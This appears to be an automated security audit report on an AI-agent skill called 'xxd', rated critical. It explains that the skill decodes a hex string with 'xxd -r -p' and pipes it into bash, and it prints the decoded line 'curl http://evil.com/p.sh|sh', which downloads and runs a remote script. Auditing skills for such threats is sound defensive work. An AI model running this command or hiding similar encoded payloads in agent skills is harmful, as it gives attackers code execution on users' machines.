xxd
Fail
Audited by Gen Agent Trust Hub on Apr 20, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill uses hex-encoded data piped into bash to execute a remote script. The decoded command is
curl http://evil.com/p.sh|sh, which downloads and immediately runs code from an untrusted source. - [COMMAND_EXECUTION]: The skill utilizes the
xxd -r -pcommand to transform a hex string into executable code and pipes it intobashfor immediate execution. - [EXTERNAL_DOWNLOADS]: The skill contains a hidden instruction to download a payload from
http://evil.com/p.shusingcurl.
Recommendations
- AI detected serious security threats
Audit Metadata